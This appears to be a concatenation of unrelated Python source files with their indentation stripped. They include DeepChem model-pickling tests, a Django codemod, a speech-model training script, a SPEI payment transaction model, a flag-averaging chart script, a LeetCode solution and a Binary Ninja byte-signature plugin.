tg.set_loss(layer)
tg.build()
tg.save()
def test_ToFloat_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ToFloat(in_layers=[feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_ReduceSum_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ReduceSum(in_layers=[feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_ReduceSquareDifference_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 1))
layer = ReduceSquareDifference(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Conv2D_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10, 10))
layer = Conv2D(num_outputs=3, in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_MaxPool_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10, 10, 10))
layer = MaxPool(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GraphConv_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 75))
degree_slice = Feature(shape=(None, 2), dtype=tf.int32)
membership = Feature(shape=(None,), dtype=tf.int32)
deg_adjs = []
for i in range(0, 10 + 1):
deg_adj = Feature(shape=(None, i + 1), dtype=tf.int32)
deg_adjs.append(deg_adj)
layer = GraphConv(
64,
activation_fn=tf.nn.relu,
in_layers=[atom_features, degree_slice, membership] + deg_adjs)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GraphPool_Pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 75))
degree_slice = Feature(shape=(None, 2), dtype=tf.int32)
membership = Feature(shape=(None,), dtype=tf.int32)
deg_adjs = []
for i in range(0, 10 + 1):
deg_adj = Feature(shape=(None, i + 1), dtype=tf.int32)
deg_adjs.append(deg_adj)
layer = GraphPool(
in_layers=[atom_features, degree_slice, membership] + deg_adjs)
tg.set_loss(layer)
tg.build()
tg.save()
def test_GraphGather_Pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 75))
degree_slice = Feature(shape=(None, 2), dtype=tf.int32)
membership = Feature(shape=(None,), dtype=tf.int32)
deg_adjs = []
for i in range(0, 10 + 1):
deg_adj = Feature(shape=(None, i + 1), dtype=tf.int32)
deg_adjs.append(deg_adj)
layer = GraphGather(
batch_size=tg.batch_size,
activation_fn=tf.nn.tanh,
in_layers=[atom_features, degree_slice, membership] + deg_adjs)
tg.set_loss(layer)
tg.build()
tg.save()
def test_BatchNorm_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10))
layer = BatchNorm(in_layers=feature)
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_WeightedError_pickle():
tg = TensorGraph()
feature = Feature(shape=(tg.batch_size, 10))
layer = WeightedError(in_layers=[feature, feature])
tg.add_output(layer)
tg.set_loss(layer)
tg.build()
tg.save()
def test_Combine_Separate_AP_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 10))
pair_feature = Feature(shape=(None, 5))
C_AP = Combine_AP(in_layers=[atom_feature, pair_feature])
S_AP = Separate_AP(in_layers=[C_AP])
tg.add_output(S_AP)
tg.set_loss(S_AP)
tg.build()
tg.save()
def test_Weave_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 75))
pair_feature = Feature(shape=(None, 14))
pair_split = Feature(shape=(None,), dtype=tf.int32)
atom_to_pair = Feature(shape=(None, 2), dtype=tf.int32)
C_AP = Combine_AP(in_layers=[atom_feature, pair_feature])
weave = WeaveLayer(in_layers=[C_AP, pair_split, atom_to_pair])
tg.add_output(weave)
tg.set_loss(weave)
tg.build()
tg.save()
def test_WeaveGather_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 75))
atom_split = Feature(shape=(None,), dtype=tf.int32)
weave_gather = WeaveGather(
32, gaussian_expand=True, in_layers=[atom_feature, atom_split])
tg.add_output(weave_gather)
tg.set_loss(weave_gather)
tg.build()
tg.save()
def test_DTNNEmbedding_pickle():
tg = TensorGraph()
atom_numbers = Feature(shape=(None, 23), dtype=tf.int32)
Embedding = DTNNEmbedding(in_layers=[atom_numbers])
tg.add_output(Embedding)
tg.set_loss(Embedding)
tg.build()
tg.save()
def test_DTNNStep_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
distance = Feature(shape=(None, 100))
distance_membership_i = Feature(shape=(None,), dtype=tf.int32)
distance_membership_j = Feature(shape=(None,), dtype=tf.int32)
DTNN = DTNNStep(in_layers=[
atom_features, distance, distance_membership_i, distance_membership_j
])
tg.add_output(DTNN)
tg.set_loss(DTNN)
tg.build()
tg.save()
def test_DTNNGather_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
atom_membership = Feature(shape=(None,), dtype=tf.int32)
Gather = DTNNGather(in_layers=[atom_features, atom_membership])
tg.add_output(Gather)
tg.set_loss(Gather)
tg.build()
tg.save()
def test_DTNNExtract_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
Ext = DTNNExtract(0, in_layers=[atom_features])
tg.add_output(Ext)
tg.set_loss(Ext)
tg.build()
tg.save()
def test_DAGLayer_pickle():
tg = TensorGraph(use_queue=False)
atom_features = Feature(shape=(None, 75))
parents = Feature(shape=(None, 50, 50), dtype=tf.int32)
calculation_orders = Feature(shape=(None, 50), dtype=tf.int32)
calculation_masks = Feature(shape=(None, 50), dtype=tf.bool)
n_atoms = Feature(shape=(), dtype=tf.int32)
DAG = DAGLayer(in_layers=[
atom_features, parents, calculation_orders, calculation_masks, n_atoms
])
tg.add_output(DAG)
tg.set_loss(DAG)
tg.build()
tg.save()
def test_DAGGather_pickle():
tg = TensorGraph()
atom_features = Feature(shape=(None, 30))
membership = Feature(shape=(None,), dtype=tf.int32)
Gather = DAGGather(in_layers=[atom_features, membership])
tg.add_output(Gather)
tg.set_loss(Gather)
tg.build()
tg.save()
def test_MP_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 75))
pair_feature = Feature(shape=(None, 14))
atom_to_pair = Feature(shape=(None, 2), dtype=tf.int32)
MP = MessagePassing(5, in_layers=[atom_feature, pair_feature, atom_to_pair])
tg.add_output(MP)
tg.set_loss(MP)
tg.build()
tg.save()
def test_SetGather_pickle():
tg = TensorGraph()
atom_feature = Feature(shape=(None, 100))
atom_split = Feature(shape=(None,), dtype=tf.int32)
Gather = SetGather(5, 16, in_layers=[atom_feature, atom_split])
tg.add_output(Gather)
tg.set_loss(Gather)
tg.build()
tg.save()
|
1620584
|
from typing import Generator, Optional, Sequence, Union
from libcst import (
Assign,
AssignTarget,
Decorator,
FlattenSentinel,
ImportFrom,
ImportStar,
Module,
Name,
RemovalSentinel,
)
from libcst import matchers as m
from django_codemod.constants import DJANGO_1_9, DJANGO_2_0
from django_codemod.visitors.base import BaseDjCodemodTransformer, import_from_matches
class AssignmentTagTransformer(BaseDjCodemodTransformer):
"""Replace `assignment_tag` by `simple_tag`."""
deprecated_in = DJANGO_1_9
removed_in = DJANGO_2_0
ctx_key_prefix = "AssignmentTagTransformer"
ctx_key_library_call_matcher = f"{ctx_key_prefix}-library_call_matcher"
ctx_key_decorator_matcher = f"{ctx_key_prefix}-decorator_matcher"
@property
def library_call_matcher(self) -> Optional[m.Call]:
return self.context.scratch.get(self.ctx_key_library_call_matcher, None)
@property
def decorators_matcher(self) -> Optional[m.BaseMatcherNode]:
return self.context.scratch.get(self.ctx_key_decorator_matcher, None)
def leave_Module(self, original_node: Module, updated_node: Module) -> Module:
"""Clear context when leaving module."""
self.context.scratch.pop(self.ctx_key_library_call_matcher, None)
self.context.scratch.pop(self.ctx_key_decorator_matcher, None)
return super().leave_Module(original_node, updated_node)
def visit_ImportFrom(self, node: ImportFrom) -> Optional[bool]:
"""Record whether an interesting import is detected."""
import_matcher = (
# django.template
self._template_import_matcher(node)
# django.template.Library
or self._library_import_matcher(node)
)
if import_matcher:
self.context.scratch[self.ctx_key_library_call_matcher] = import_matcher
return None
def _template_import_matcher(self, node: ImportFrom) -> Optional[m.Call]:
"""Return matcher if django.template is imported."""
imported_name_str = self._get_imported_name(node, "django.template")
if not imported_name_str:
return None
# Build the `Call` matcher to look out for, e.g. `template.Library()`
return m.Call(
func=m.Attribute(
attr=m.Name("Library"), value=m.Name(value=imported_name_str)
)
)
def _library_import_matcher(self, node: ImportFrom) -> Optional[m.Call]:
"""Return matcher if django.template.Library is imported."""
imported_name_str = self._get_imported_name(node, "django.template.Library")
if not imported_name_str:
return None
# Build the `Call` matcher to look out for, e.g. `Library()`
return m.Call(func=m.Name(imported_name_str))
@staticmethod
def _get_imported_name(node: ImportFrom, import_path: str) -> Optional[str]:
"""Resolve the imported name if present."""
if isinstance(node.names, ImportStar):
return None
*modules, name = import_path.split(".")
if not import_from_matches(node, modules):
return None
for import_alias in node.names:
if m.matches(import_alias, m.ImportAlias(name=m.Name(name))):
# We're visiting the import statement we're looking for
# Get the actual name it's imported as (in case of import alias)
imported_name_str = (
import_alias.evaluated_alias or import_alias.evaluated_name
)
return imported_name_str
return None
def visit_Assign(self, node: Assign) -> Optional[bool]:
"""Record variable name the `Library()` call is assigned to."""
if self.library_call_matcher and m.matches(
node,
m.Assign(value=self.library_call_matcher),
):
# Visiting a `register = template.Library()` statement
# Generate decorator matchers based on left hand side names
decorator_matchers = self._gen_decorator_matchers(node.targets)
# should match if any of the decorator matches
self.context.scratch[self.ctx_key_decorator_matcher] = m.OneOf(
*decorator_matchers
)
return super().visit_Assign(node)
@staticmethod
def _gen_decorator_matchers(
assign_targets: Sequence[AssignTarget],
) -> Generator[m.Decorator, None, None]:
"""Generate matchers for all possible decorators."""
for assign_target in assign_targets:
# for each variable it's assigned to
if isinstance(assign_target.target, Name):
# get the name of the target
target_str = assign_target.target.value
# matcher we should use for finding decorators to modify
yield m.Decorator(
decorator=m.Attribute(
value=m.Name(target_str),
attr=m.Name("assignment_tag"),
)
)
def leave_Decorator(
self, original_node: Decorator, updated_node: Decorator
) -> Union[Decorator, FlattenSentinel[Decorator], RemovalSentinel]:
"""Update decorator call if all conditions are met."""
if self.decorators_matcher and m.matches(updated_node, self.decorators_matcher):
# If we have a decorator matcher, and it matches,
# then update the node with new name
updated_decorator = updated_node.decorator.with_changes(
attr=Name("simple_tag")
)
return updated_node.with_changes(decorator=updated_decorator)
return super().leave_Decorator(original_node, updated_node)
|
1620626
|
import re
import os
import yaml
import random
import logging
import shutil
import numpy as np
import oneflow as flow
import argparse
from otrans.model import End2EndModel, LanguageModel
from otrans.train.scheduler import BuildOptimizer, BuildScheduler
from otrans.train.trainer import Trainer
from otrans.utils import count_parameters
from otrans.data.loader import FeatureLoader
def main(args, params, expdir):
model_type = params["model"]["type"]
if model_type[-2:] == "lm":
model = LanguageModel[model_type](params["model"])
else:
model = End2EndModel[model_type](params["model"])
# Count total parameters
count_parameters(model.named_parameters())
if args.ngpu >= 1:
model.cuda()
logging.info(model)
optimizer = BuildOptimizer[params["train"]["optimizer_type"]](
filter(lambda p: p.requires_grad, model.parameters()),
**params["train"]["optimizer"]
)
logger.info("[Optimizer] Build a %s optimizer!" % params["train"]["optimizer_type"])
scheduler = BuildScheduler[params["train"]["scheduler_type"]](
optimizer, **params["train"]["scheduler"]
)
logger.info("[Scheduler] Build a %s scheduler!" % params["train"]["scheduler_type"])
trainer = Trainer(
params,
model=model,
optimizer=optimizer,
scheduler=scheduler,
expdir=expdir,
ngpu=args.ngpu,
local_rank=args.local_rank,
is_debug=args.debug,
keep_last_n_chkpt=args.keep_last_n_chkpt,
from_epoch=args.from_epoch,
)
train_loader = FeatureLoader(params, "train", ngpu=args.ngpu)
trainer.train(train_loader=train_loader)
import multiprocessing as mp
mp.set_start_method("spawn", True)
parser = argparse.ArgumentParser()
parser.add_argument(
"-c", "--config", type=str, default="egs/aishell/conf/transformer_baseline.yaml"
)
parser.add_argument("-n", "--ngpu", type=int, default=1)
parser.add_argument("-g", "--gpus", type=str, default="0")
parser.add_argument("-r", "--local_rank", type=int, default=0)
parser.add_argument(
"-l", "--logging_level", type=str, default="info", choices=["info", "debug"]
)
parser.add_argument("-lg", "--log_file", type=str, default=None)
parser.add_argument("-dir", "--expdir", type=str, default=None)
parser.add_argument("-debug", "--debug", action="store_true", default=False)
parser.add_argument("-knpt", "--keep_last_n_chkpt", type=int, default=30)
parser.add_argument("-tfs", "--from_step", type=int, default=0)
parser.add_argument("-tfe", "--from_epoch", type=int, default=0)
cmd_args = parser.parse_args()
with open(cmd_args.config, "r") as f:
params = yaml.load(f, Loader=yaml.FullLoader)
if cmd_args.expdir is not None:
expdir = os.path.join(cmd_args.expdir, params["train"]["save_name"])
else:
expdir = os.path.join(
"egs", params["data"]["name"], "exp", params["train"]["save_name"]
)
if not os.path.exists(expdir):
os.makedirs(expdir)
shutil.copy(cmd_args.config, os.path.join(expdir, "config.yaml"))
logging_level = {"info": logging.INFO, "debug": logging.DEBUG}
if cmd_args.log_file is not None:
log_file = cmd_args.log_file
else:
log_file = cmd_args.config.split("/")[-1][:-5] + ".log"
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging_level[cmd_args.logging_level], format=LOG_FORMAT)
logger = logging.getLogger(__name__)
if cmd_args.ngpu == 1:
os.environ["CUDA_VISIBLE_DEVICES"] = str(cmd_args.gpus)
logger.info("Set CUDA_VISIBLE_DEVICES as %s" % cmd_args.gpus)
main(cmd_args, params, expdir)
|
1620633
|
from rest_framework import viewsets
from rest_framework import mixins
from .models import Library
from .serializers import LibrarySerializer
from .permissions import IsRegisteredInLibrary
class LibraryViewSet(mixins.RetrieveModelMixin, viewsets.GenericViewSet):
queryset = Library.objects.all()
serializer_class = LibrarySerializer
permission_classes = [IsRegisteredInLibrary]
|
1620640
|
print("This line will be printed.")
x = 1
if x == 1:
# indented four spaces
print("x is 1.")
print("Goodbye, World!")
|
1620643
|
import argparse
from aumbry.cli import upload, edit, view
def parse_arguments(argv=None):
parser = argparse.ArgumentParser(
'aumbry',
description='CLI Tool for Aumbry'
)
subparsers = parser.add_subparsers()
upload.setup_arguments(subparsers)
edit.setup_arguments(subparsers)
view.setup_arguments(subparsers)
return parser.parse_args(argv)
def main(argv=None):
arguments = parse_arguments(argv)
commands = {
'upload': upload.command,
'edit': edit.command,
'view': view.command,
}
return commands[arguments.command](arguments)
|
1620654
|
from rest_framework.status import HTTP_400_BAD_REQUEST
ERROR_GROUP_USER_IS_LAST_ADMIN = (
"ERROR_GROUP_USER_IS_LAST_ADMIN",
HTTP_400_BAD_REQUEST,
"The related user is the last admin in the group. He must delete the group or "
"give someone else admin permissions.",
)
|
1620682
|
from pudzu.charts import *
from pudzu.sandbox.bamboo import *
import scipy.stats
flags = pd.read_csv("../dataviz/datasets/countries.csv").filter_rows("organisations >> un").split_columns('country', "|").explode('country').set_index('country').drop_duplicates(subset='flag', keep='first')
continents = flags.groupby("continent").count().index
SIZE = 100
FLAG_WIDTH = 6*SIZE
BOX_WIDTH = SIZE * 3 // 4
LABEL_FONT = calibri(SIZE, bold=True)
SUB_FONT = partial(calibri, SIZE*2//3)
def flag_image(c):
return Image.from_url_with_cache(flags['flag'][c]).convert("RGBA").remove_transparency("white").convert("RGB")
def label_image(text, align="center"):
return Image.from_text(text.upper().replace(" ","\n"), LABEL_FONT, "black", "white", align=align)
def mean_image(imgs, size):
average = ImageColor.from_linear(sum(ImageColor.to_linear(np.array(img.resize(size))) for img in imgs) / len(imgs))
return Image.fromarray(np.uint8(average))
class HeraldicPalette(metaclass=NamedPaletteMeta):
# Omits Murrey and Sanguine (which are very similar to Gules and Purpure) and Cendree and Carnation (which are barely used).
OR = "#fcdd09"
ARGENT = "#ffffff"
AZURE = "#0f47af"
GULES = "#da121a"
PURPURE = "#9116a1"
SABLE = "#000000"
VERT = "#009200"
TENNE = "#804000"
ORANGE = "#ff8000"
CELESTE = "#75aadb"
def mode_image(imgs, size):
a = np.stack([np.array(img.to_palette(HeraldicPalette).resize(size)) for img in imgs], axis=-1)
mode = Image.fromarray(scipy.stats.mode(a, -1)[0][...,0], "P")
mode.putpalette(list(generate_leafs(RGBA(col)[:3] for col in list(HeraldicPalette))))
return mode.to_rgba()
def median_image(imgs, size):
a = np.stack([np.array(img.convert("L").resize(size)) for img in imgs], axis=-1)
median = np.median(a, axis=-1)
return Image.fromarray(np.uint8(median), "L").to_rgba()
def median_image_rgb(imgs, size):
imgs = [img.resize(size) for img in imgs]
arrays = [np.stack([np.array(img.getchannel(i)) for img in imgs], axis=-1) for i in range(3)]
medians = [Image.fromarray(np.uint8(np.median(a, axis=-1)), "L") for a in arrays]
return Image.merge("RGB", medians)
def average_flag(df, size, average):
flags = [flag_image(i) for i in df.index]
return average(flags, (size[0]-2,size[1]-2)).pad(1, "black")
def average_flags(label, average):
world = average_flag(flags, (FLAG_WIDTH, FLAG_WIDTH*2//3), average)
continent = [average_flag(flags[flags.continent == continent], (FLAG_WIDTH, FLAG_WIDTH*2//3), average) for continent in continents]
return [label_image(label), world] + continent
array = [[None, label_image("world")] + [label_image(c) for c in continents],
average_flags("mean", mean_image),
average_flags("mode", mode_image),
average_flags("median", median_image_rgb)]
grid = Image.from_array(tmap(list, zip(*array)), bg="white", padding=SIZE // 5, xalign=(1,0.5,0.5,0.5,0.5))
title = Image.from_column([
Image.from_text("Average flags of the world".upper(), calibri(SIZE*2, bold=True), "black", "white"),
Image.from_text("mean versus mode versus median", calibri(SIZE*3//2, italics=True), "black", "white")
], padding=SIZE//10)
descriptions = [
Image.from_markup("Averages flags of the 195 member and observer states of the UN, resized to a constant aspect ratio.", SUB_FONT),
Image.from_markup("**Mean flags** calculated by first converting from sRGB to linear RGB.", SUB_FONT),
Image.from_row([
Image.from_markup("**Modal flags** calculated by first quantizing to heraldic colors: ", SUB_FONT),
Checkers((BOX_WIDTH*len(HeraldicPalette), BOX_WIDTH), GradientColormap(*HeraldicPalette), shape=(len(HeraldicPalette), 1), colors=len(HeraldicPalette)).add_grid((len(HeraldicPalette), 1))]),
Image.from_markup("**Median flags** calculated separately for each RGB channel.", SUB_FONT)]
img = Image.from_column([title, Image.from_column(descriptions, equal_heights=True, xalign=0), grid], padding=SIZE//4, bg="white")
img.place(Image.from_text("/u/Udzu", font("arial", 40), fg="black", bg="white", padding=10).pad((2,2,0,0), "black"), align=1, padding=20, copy=False)
img.save("output/flagsaverage2.png")
# Extras
# array = [[None, label_image("world")] + [label_image(c, "right") for c in continents], average_flags("RGB median", median_image_rgb)]
# grid = Image.from_array(tmap(list, zip(*array)), bg="white", padding=SIZE // 5, xalign=(1,0.5))
|
1620737
|
class SolutionSort:
def longestWord(self, words: List[str]) -> str:
word_set = set(words)
# sort the words on the length and then the lexical word
words.sort(key = lambda s: (-len(s), s))
# Greedily to find the first word that qualifies
for word in words:
if all([word[:k] in word_set for k in range(1, len(word))]):
return word
return ""
class Solution:
def longestWord(self, words: List[str]) -> str:
trie = dict()
trie["$"] = "" # pseudo mark
def update_trie(word, trie):
""" Update the Trie structure with a new word """
for letter in word:
if letter not in trie:
trie[letter] = dict()
trie = trie[letter]
# mark the end of word
trie["$"] = word
for word in words:
update_trie(word, trie)
max_word = ""
def dfs(node):
"""
Traverse the Trie (as Tree) to find the deepest/longest word
"""
nonlocal max_word
# missing a match of word at this prefix
if "$" not in node:
return
if len(node["$"]) > len(max_word):
max_word = node["$"]
elif len(node["$"]) == len(max_word) and node["$"] < max_word:
max_word = node["$"]
for key in node.keys():
if key != "$":
dfs(node[key])
dfs(trie)
return max_word
|
1620761
|
import os
from datetime import datetime
from enum import Enum
from mongoengine import (
DateTimeField,
Document,
DoesNotExist,
IntField,
ListField,
ReferenceField,
StringField,
signals,
)
from stpmex.resources import Orden
from speid import STP_EMPRESA
from speid.exc import MalformedOrderException
from speid.helpers import callback_helper
from speid.processors import stpmex_client
from speid.types import Estado, EventType
from .account import Account
from .base import BaseModel
from .events import Event
from .helpers import (
EnumField,
date_now,
delete_events,
handler,
save_events,
updated_at,
)
SKIP_VALIDATION_PRIOR_SEND_ORDER = (
os.getenv('SKIP_VALIDATION_PRIOR_SEND_ORDER', 'false').lower() == 'true'
)
@handler(signals.pre_save)
def pre_save_transaction(sender, document):
date = document.fecha_operacion or datetime.today()
document.compound_key = (
f'{document.clave_rastreo}:{date.strftime("%Y%m%d")}'
)
@updated_at.apply
@save_events.apply
@pre_save_transaction.apply
@delete_events.apply
class Transaction(Document, BaseModel):
created_at = date_now()
updated_at = DateTimeField()
stp_id = IntField()
fecha_operacion = DateTimeField()
institucion_ordenante = StringField()
institucion_beneficiaria = StringField()
clave_rastreo = StringField()
monto = IntField()
nombre_ordenante = StringField()
tipo_cuenta_ordenante = IntField()
cuenta_ordenante = StringField()
rfc_curp_ordenante = StringField()
nombre_beneficiario = StringField()
tipo_cuenta_beneficiario = IntField()
cuenta_beneficiario = StringField()
rfc_curp_beneficiario = StringField()
concepto_pago = StringField()
referencia_numerica = IntField()
empresa = StringField()
estado: Enum = EnumField(Estado, default=Estado.created)
version = IntField()
speid_id = StringField()
folio_origen = StringField()
tipo_pago = IntField()
email_beneficiario = StringField()
tipo_cuenta_beneficiario2 = StringField()
nombre_beneficiario2 = StringField()
cuenta_beneficiario2 = StringField()
rfc_curpBeneficiario2 = StringField()
concepto_pago2 = StringField()
clave_cat_usuario1 = StringField()
clave_cat_usuario2 = StringField()
clave_pago = StringField()
referencia_cobranza = StringField()
tipo_operacion = StringField()
topologia = StringField()
usuario = StringField()
medio_entrega = IntField()
prioridad = IntField()
compound_key = StringField()
detalle = StringField()
events = ListField(ReferenceField(Event))
meta = {
'indexes': [
'+stp_id',
'+speid_id',
'+clave_rastreo',
# The Unique-Sparse index skips over any document that is missing
# the indexed field (null values)
{'fields': ['+compound_key'], 'unique': True, 'sparse': True},
]
}
def set_state(self, state: Estado):
callback_helper.set_status_transaction(self.speid_id, state.value)
self.estado = state
self.events.append(Event(type=EventType.completed))
def confirm_callback_transaction(self):
response = ''
self.events.append(Event(type=EventType.created))
self.save()
self.estado = Estado.succeeded
callback_helper.send_transaction(self.to_dict())
self.events.append(
Event(type=EventType.completed, metadata=str(response))
)
def create_order(self) -> Orden:
# Validate account has already been created
if not SKIP_VALIDATION_PRIOR_SEND_ORDER:
try:
account = Account.objects.get(cuenta=self.cuenta_ordenante)
assert account.estado is Estado.succeeded
except (DoesNotExist, AssertionError):
self.estado = Estado.error
self.save()
raise MalformedOrderException(
f'Account has not been registered: {self.cuenta_ordenante}'
f', stp_id: {self.stp_id}'
)
# Don't send if stp_id already exists
if self.stp_id:
return Orden( # type: ignore
id=self.stp_id,
monto=self.monto / 100.0,
conceptoPago=self.concepto_pago,
nombreBeneficiario=self.nombre_beneficiario,
cuentaBeneficiario=self.cuenta_beneficiario,
institucionContraparte=self.institucion_beneficiaria,
cuentaOrdenante=self.cuenta_ordenante,
)
optionals = dict(
institucionOperante=self.institucion_ordenante,
claveRastreo=self.clave_rastreo,
referenciaNumerica=self.referencia_numerica,
rfcCurpBeneficiario=self.rfc_curp_beneficiario,
medioEntrega=self.medio_entrega,
prioridad=self.prioridad,
tipoPago=self.tipo_pago,
topologia=self.topologia,
)
# remove if value is None
remove = []
for k, v in optionals.items():
if v is None:
remove.append(k)
for k in remove:
optionals.pop(k)
try:
order = stpmex_client.ordenes.registra(
monto=self.monto / 100.0,
conceptoPago=self.concepto_pago,
nombreBeneficiario=self.nombre_beneficiario,
cuentaBeneficiario=self.cuenta_beneficiario,
institucionContraparte=self.institucion_beneficiaria,
tipoCuentaBeneficiario=self.tipo_cuenta_beneficiario,
nombreOrdenante=self.nombre_ordenante,
cuentaOrdenante=self.cuenta_ordenante,
rfcCurpOrdenante=self.rfc_curp_ordenante,
**optionals,
)
except (Exception) as e: # Anything can happen here
self.events.append(Event(type=EventType.error, metadata=str(e)))
self.estado = Estado.error
self.save()
raise e
else:
self.clave_rastreo = self.clave_rastreo or order.claveRastreo
self.rfc_curp_beneficiario = (
self.rfc_curp_beneficiario or order.rfcCurpBeneficiario
)
self.referencia_numerica = (
self.referencia_numerica or order.referenciaNumerica
)
self.empresa = self.empresa or STP_EMPRESA
self.stp_id = order.id
self.events.append(
Event(type=EventType.completed, metadata=str(order))
)
self.estado = Estado.submitted
self.save()
return order
|
1620773
|
from binaryninja import *
from multiprocessing import *
def get_address_from_sig(bv, sigList):
br = BinaryReader(bv)
result = 0
length = len(sigList) - 1
for search_func in bv.functions:
br.seek(search_func.start)
while bv.get_functions_containing(br.offset + length) != None and search_func in bv.get_functions_containing(br.offset + length):
found = True
counter = 0
for entry in sigList:
byte = br.read8()
counter += 1
if entry != byte and entry != '?':
found = False
break
br.offset -= counter
if found:
result = br.offset
break
br.offset += bv.get_instruction_length(br.offset)
if result != 0:
break
return result
def test_address_for_sig(bv, addr, sigList):
br = BinaryReader(bv)
length = len(sigList) - 1
br.seek(addr)
containing = bv.get_functions_containing(br.offset + length)
if containing == None or len(containing) == 0:
return False
found = True
for entry in sigList:
byte = br.read8()
if entry != byte and entry != '?':
found = False
break
return found
def get_amount_of_hits(bv, sigList):
br = BinaryReader(bv)
result = 0
if len(sigList) == 0:
return result
sigLen = len(sigList) - 1
for search_func in bv.functions:
br.seek(search_func.start)
while bv.get_functions_containing(br.offset + sigLen) != None and search_func in bv.get_functions_containing(br.offset + sigLen):
found = True
counter = 0
for entry in sigList:
byte = br.read8()
counter += 1
if entry != byte and entry != '?':
found = False
break
br.offset -= counter
if found:
result += 1
br.offset += bv.get_instruction_length(br.offset)
return result
def get_addr_of_hits(bv, sigList):
br = BinaryReader(bv)
result = []
if len(sigList) == 0:
return result
sigLen = len(sigList) - 1
for search_func in bv.functions:
br.seek(search_func.start)
while bv.get_functions_containing(br.offset + sigLen) != None and search_func in bv.get_functions_containing(br.offset + sigLen):
found = True
counter = 0
for entry in sigList:
byte = br.read8()
counter += 1
if entry != byte and entry != '?':
found = False
break
br.offset -= counter
if found:
result.append(br.offset)
br.offset += bv.get_instruction_length(br.offset)
if bv.get_instruction_length(br.offset) == 0:
break
return result
def SigMakerFind(bv):
f = Finder(bv)
f.start()
class Finder(BackgroundTaskThread):
def __init__(self, bv):
BackgroundTaskThread.__init__(self, "Finding Signature...", True)
self.bv = bv
def run(self):
user_input = get_text_line_input("Find Signature\t\t\t\t\t", "SigMaker")
if user_input == None:
return
sig = user_input.split(" ")
sigList = []
for value in sig:
if value == '?':
sigList.append(value)
elif value != '?' and value != '':
sigList.append(int(value,16))
result = get_address_from_sig(self.bv, sigList)
if result != 0:
new_result = result
print 'Found:\t' + convert_to_hex_string(new_result) + '\nInside:\t' + convert_to_hex_string(self.bv.get_functions_containing(new_result)[0].start) + '\nSignature:\t' + user_input #+ '\nHits:\t' + convert_to_hex_string(get_amount_of_hits(bv,sigList))
res = show_message_box("Search result",'Address:\t' + convert_to_hex_string(new_result) + '\n' + 'Function:\t' + convert_to_hex_string(self.bv.get_functions_containing(new_result)[0].start) + '\nWant to jump to the address?', MessageBoxButtonSet.YesNoButtonSet, MessageBoxIcon.InformationIcon)
if res == MessageBoxButtonResult.YesButton:
self.bv.file.navigate(self.bv.file.view, new_result)
else:
print 'Found:\t' + 'None' + '\nInside:\t' + 'None' + '\nSignature:\t' + user_input
show_message_box("Search result",'Address:\t' + 'NONE' + '\n' + 'Function:\t' + 'NONE' + '\n', MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.InformationIcon)
def get_instruction_sig(bv, func, addr):
const = func.get_constants_referenced_by(addr)
length = bv.get_instruction_length(addr)
br = BinaryReader(bv)
br.seek(addr)
sig = []
if len(const) == 0:
for x in range(length):
sig.append(br.read8())
elif len(const) > 0:
br.offset += length
new_delta = 0
for cur_const in const:
if cur_const.pointer:
new_delta += 4
else:
br.offset -= new_delta + 1
if const[0].value == br.read8():
new_delta += 1
else:
br.offset -= new_delta + 4
if const[0].value == br.read32():
new_delta += 4
br.offset = addr
for x in range(length - new_delta):
sig.append(br.read8())
for x in range(new_delta):
sig.append('?')
return sig
def get_sig_from_address(bv, addr, first_try = True):
sigList = []
length = len(sigList) - 1
if addr == None:
return sigList
offset = addr
org_func = bv.get_functions_containing(offset)
if len(org_func) == 0:
return sigList
sigList.extend(get_instruction_sig(bv, org_func[0], offset))
if len([x for x in sigList if x != '?']) < 4:
offset += bv.get_instruction_length(offset)
sigList.extend(get_instruction_sig(bv, org_func[0], offset))
hitList = get_addr_of_hits(bv, sigList)
while len(hitList) > 1:
offset += bv.get_instruction_length(offset)
containing = bv.get_functions_containing(offset + 1)
if containing == None or len(containing) == 0 or containing[0] != org_func[0] and first_try:
return get_sig_from_address(bv, org_func[0].start, False)
elif not first_try:
return []
if len(sigList) > 48 and first_try:
return get_sig_from_address(bv, org_func[0].start, False)
elif not first_try:
return []
sigList.extend(get_instruction_sig(bv, org_func[0], offset))
for hit in hitList:
if hit == addr:
continue
if not test_address_for_sig(bv, hit, sigList):
hitList = [x for x in hitList if x != hit]
return sigList
def convert_to_hex_string(value):
str_value = (hex(value).rstrip("L").lstrip("0x").upper() or "0")
if len(str_value) == 1:
return '0' + str_value
else:
return str_value
def convert_to_string(sigList):
if len(sigList) == 0:
return "NONE"
str_sig = ""
count = 0
for entry in sigList:
if entry != '?':
str_sig += convert_to_hex_string(entry)
else:
str_sig += entry
count += 1
if count != len(sigList):
str_sig += ' '
return str_sig
def SigMakerCreate(bv, addr):
show_message_box("Create Signature","It can take a while for the plugin to finish.\nThe search will run in the background but you can cancel it at any time.\nPress 'OK' if you want to start.", MessageBoxButtonSet.OKButtonSet, MessageBoxIcon.InformationIcon)
